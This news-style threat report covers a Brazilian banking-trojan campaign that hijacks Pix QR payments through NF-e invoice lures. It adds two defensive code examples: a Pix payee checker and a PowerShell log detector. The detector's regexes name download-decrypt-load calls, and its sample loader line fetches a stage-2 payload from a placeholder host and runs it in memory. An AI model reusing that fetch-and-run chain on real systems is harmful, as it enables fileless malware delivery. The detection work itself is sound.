Banana RAT Hijacks Brazil Pix QR Codes via NF-e Lures

SHADOW-WATER-063 deploys Banana RAT via fraudulent Brazilian NF-e invoice lures, hijacking Pix QR codes to redirect instant payments to attacker-held accounts.

    A newly documented threat actor designated SHADOW-WATER-063 is running a campaign against customers and employees of major Brazilian financial institutions using a remote access trojan purpose-built for banking fraud. The most operationally dangerous capability of the malware, named Banana RAT, is its ability to intercept Brazil’s Pix instant payment QR codes — silently replacing a legitimate payment target with an attacker-controlled account at the moment of transaction. Because Pix transfers are instant and irreversible, victims typically have no recovery path once a payment routes to the wrong destination.

    Banana RAT’s Pix QR Code Interception

    Brazil’s Pix instant payment system processed over 60 billion transactions in 2025 and is deeply embedded in everyday commerce. Unlike traditional bank transfers, Pix operates without the processing windows that allow fraud detection teams to intervene before funds move. Banana RAT’s Pix interception module exploits this architecture: when a victim initiates a Pix payment using a QR code, the malware detects the action on-screen, replaces the QR code data with attacker-controlled payment credentials, and completes the substitution before the banking application encodes the transaction. The victim sees a legitimate interface; the funds move to an attacker-held account.
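The substitution described above leaves the QR code internally consistent, so a payer or a monitoring tool can only detect it by decoding the code and comparing the payee with the invoice. The following is an added example, not code from the article or from any bank: it decodes a Pix "BR Code" payload and checks its Pix key, assuming the publicly documented Banco Central do Brasil format (EMVCo TLV text, Pix key under tag 26, CRC16-CCITT-FALSE in tag 63); both sample payloads are constructed.

```python
# Added example (not code from the article): decode a Pix QR ("BR Code") payload and
# check the payee against the invoice. Assumes the public Banco Central do Brasil format:
# EMVCo TLV text (2-digit ID, 2-digit length, value), Pix key under tag 26 with GUI
# "br.gov.bcb.pix", tag 63 = CRC16-CCITT-FALSE over all text through "6304".
def crc16_ccitt_false(data: bytes) -> int:
    crc = 0xFFFF  # init 0xFFFF, poly 0x1021, no reflection, no xor-out
    for byte in data:
        crc ^= byte << 8
        for _ in range(8):
            crc = ((crc << 1) ^ 0x1021) if crc & 0x8000 else (crc << 1)
            crc &= 0xFFFF
    return crc

def parse_tlv(s: str) -> dict:
    """One TLV level -> {tag: value}; nested values (tag 26) are parsed again by the caller."""
    fields, i = {}, 0
    while i < len(s):
        tag, length = s[i:i + 2], int(s[i + 2:i + 4])
        value = s[i + 4:i + 4 + length]
        if len(value) != length:
            raise ValueError(f"truncated field {tag}")
        fields[tag] = value
        i += 4 + length
    return fields

def decode_pix(payload: str) -> dict:
    """Verify the CRC, then return the fields a payer should compare with the invoice."""
    if payload[-8:-4] != "6304" or crc16_ccitt_false(payload[:-4].encode()) != int(payload[-4:], 16):
        raise ValueError("missing or wrong CRC: payload corrupted or edited in place")
    top = parse_tlv(payload)
    account = parse_tlv(top.get("26", ""))
    if account.get("00", "").lower() != "br.gov.bcb.pix":
        raise ValueError("tag 26 does not carry a Pix account")
    return {"pix_key": account.get("01"), "merchant_name": top.get("59"),
            "city": top.get("60"), "amount": top.get("54")}

def payee_matches(payload: str, expected_key: str) -> bool:
    """A rebuilt QR carries a valid CRC, so only comparing the key with the invoice catches a swap."""
    try:
        return decode_pix(payload)["pix_key"] == expected_key
    except ValueError:
        return False

def build_pix(key: str, name: str, city: str, amount: str) -> str:
    # Assemble a static payload with a correct CRC (used only to construct the samples below).
    tlv = lambda tag, val: f"{tag}{len(val):02d}{val}"
    account = tlv("00", "br.gov.bcb.pix") + tlv("01", key)
    body = (tlv("00", "01") + tlv("01", "11") + tlv("26", account) + tlv("52", "0000") + tlv("53", "986")
            + tlv("54", amount) + tlv("58", "BR") + tlv("59", name) + tlv("60", city) + tlv("62", tlv("05", "***")) + "6304")
    return body + f"{crc16_ccitt_false(body.encode()):04X}"

LEGIT_PAYLOAD = build_pix("loja@example.com", "LOJA EXEMPLO", "SAO PAULO", "10.00")    # constructed
SWAPPED_PAYLOAD = build_pix("outro@example.net", "LOJA EXEMPLO", "SAO PAULO", "10.00")  # constructed
```

Note that SWAPPED_PAYLOAD keeps the merchant name and amount and passes the CRC check; only the key comparison exposes it, which is why the displayed payee, not the code's integrity, is what a confirmation screen has to show.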

    Banking Overlay Injection and Credential Capture

    Beyond Pix interception, Banana RAT deploys banking overlay injections against specific bank portals operated by Itaú, Bradesco, and Santander — three of the major Brazilian financial institutions identified as targets in the campaign. When a victim navigates to an affected banking portal, the malware renders a transparent overlay that captures login credentials before passing the session through to the legitimate site, allowing the attacker to harvest banking credentials without triggering visible errors.

    Banana RAT also maintains real-time screen capture and remote control capabilities, enabling the attacker to observe the victim’s screen and execute transactions manually while the victim’s system is active. Combined with keylogging and clipboard theft, this gives SHADOW-WATER-063 multiple overlapping channels for credential and payment theft from a single infected machine.

    The NF-e Invoice Lure and Fileless Delivery Chain

    The campaign’s delivery method targets a compliance reality that makes every Brazilian business a plausible victim: the NF-e, or Nota Fiscal Eletrônica, is Brazil’s official mandatory electronic invoice system. Every business operating in Brazil is legally required to issue NF-e documents, which means recipients are highly conditioned to open invoice notifications from unfamiliar suppliers. SHADOW-WATER-063 weaponizes this compliance expectation by distributing WhatsApp messages and phishing links directing victims to download a file named “Consultar_NF-e.bat” from domains spoofed to resemble official government sites.

    Obfuscated PowerShell and In-Memory Execution

    The batch file executes obfuscated PowerShell that retrieves AES-256-CBC-encrypted payloads from attacker-controlled infrastructure. Critically, those payloads are executed entirely in memory — no malware binary is written to disk at any stage of the infection chain. This fileless execution model significantly complicates endpoint detection: traditional antivirus and endpoint detection tools that rely on file scanning or file-write events have no artifact to identify, and behavioral detection must catch the PowerShell execution itself before the payload decrypts and runs in process memory.

    The use of AES-256-CBC encryption for the payload adds another layer: network-level inspection that intercepts the download sees only ciphertext, and without the decryption key embedded in the initial PowerShell stage, automated sandboxes cannot reconstruct the full infection chain from network traffic alone.
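Since the network side sees only ciphertext and no file ever lands on disk, the practical detection point is the PowerShell script block itself. The following is an added example, not code from the article: it scores script-block log text for the stages of the chain described above (hidden launch, download, AES decrypt, in-memory load), assuming Script Block Logging is enabled and the ScriptBlockText of Event ID 4104 has already been extracted; all sample blocks are constructed excerpts.

```python
# Added example (not code from the article): triage PowerShell script-block text for the
# fileless chain described above. Assumes Script Block Logging (Event ID 4104) is on and
# ScriptBlockText is already a plain string. Sample blocks are constructed excerpts.
import re

# (stage, pattern, weight): decrypt and load stages are weighted above downloads, which
# are common in routine admin scripts on their own.
RULES = [
    ("hidden-launch", re.compile(r"-(?:w(?:indowstyle)?\s+hidden|nop(?:rofile)?|(?:ep|executionpolicy)\s+bypass)", re.I), 1),
    ("encoded-command", re.compile(r"-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I), 2),
    ("download", re.compile(r"DownloadString|DownloadData|Invoke-WebRequest|Net\.WebClient|\biwr\b", re.I), 2),
    ("aes-decrypt", re.compile(r"AesManaged|Cryptography\.Aes\b|AesCryptoServiceProvider|CreateDecryptor", re.I), 3),
    ("in-memory-load", re.compile(r"Reflection\.Assembly\]::Load\(|Invoke-Expression|\bIEX\b", re.I), 3),
]
FULL_CHAIN = {"download", "aes-decrypt", "in-memory-load"}

def score_script_block(text: str) -> dict:
    """Return the matched stages, a weighted score and a verdict for one script block."""
    hits = [stage for stage, rx, _ in RULES if rx.search(text)]
    score = sum(w for stage, _, w in RULES if stage in hits)
    if FULL_CHAIN <= set(hits) or score >= 6:
        verdict = "high"     # the whole download-decrypt-load chain, or most of it, is present
    elif score >= 3:
        verdict = "medium"   # decrypt or load without the rest: worth an analyst's look
    else:
        verdict = "low"      # a lone download or launch flag is normal admin noise
    return {"hits": hits, "score": score, "verdict": verdict}

def triage(blocks: dict) -> list:
    """Names of the blocks an analyst should open first, highest verdict first."""
    order = {"high": 0, "medium": 1, "low": 2}
    verdicts = {name: score_script_block(text)["verdict"] for name, text in blocks.items()}
    ranked = sorted(verdicts, key=lambda n: (order[verdicts[n]], n))
    return [n for n in ranked if verdicts[n] != "low"]

SAMPLE_BLOCKS = {
    # constructed excerpt shaped like the stage-1 loader the article describes (placeholders only)
    "loader": ("powershell -nop -w hidden -ep bypass ... New-Object Net.WebClient ... "
               ".DownloadData('http://placeholder.invalid/stage2') ... "
               "[Security.Cryptography.Aes]::Create() ... .CreateDecryptor(...) ... "
               "[Reflection.Assembly]::Load(...)"),
    # constructed: a legitimate admin download that shares one API with the loader
    "report-pull": "Invoke-WebRequest -Uri https://placeholder.invalid/r.csv -OutFile C:\\Temp\\r.csv",
    # constructed: decrypts a local config but never fetches or loads code
    "config-tool": "$aes=[Security.Cryptography.Aes]::Create(); $dec=$aes.CreateDecryptor($k,$iv)",
    "cleanup": "Get-ChildItem C:\\Temp -Recurse | Remove-Item -Force",
}
```

The regexes will not catch every obfuscation, so treat them as a starting point to pair with the cmd.exe-to-powershell.exe parent relationship that a .bat launcher produces in process-creation telemetry.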

    SHADOW-WATER-063 as a Newly Documented Threat Actor

    Analysis published May 22, 2026 by GBHackers marks the first time SHADOW-WATER-063 has appeared in public threat intelligence. The actor has no prior documented attribution history, meaning existing threat intelligence platforms carry no indicators of compromise, no historical infrastructure, and no prior campaign data. This absence of prior coverage means organizations relying on reputation-based blocking of known-bad infrastructure are starting from zero for this group.

    Banana RAT itself is equally undocumented in prior public research. The first attribution of this malware family to SHADOW-WATER-063 leaves no historical baseline for defenders to assess how long the actor has been operational or how many campaigns preceded this one.

    Brazil’s banking sector has historically attracted a well-developed ecosystem of financial trojans engineered specifically for Brazilian payment platforms and authentication mechanisms. Banana RAT’s Pix interception capability represents a specific evolution within that ecosystem — one that directly exploits the operational characteristics of an instant payment rail that has achieved near-universal adoption in Brazilian commerce. The combination of a mandatory-compliance delivery lure, a fileless execution chain, and a Pix-specific fraud module makes this campaign technically coherent and difficult to defend against at any single control point.
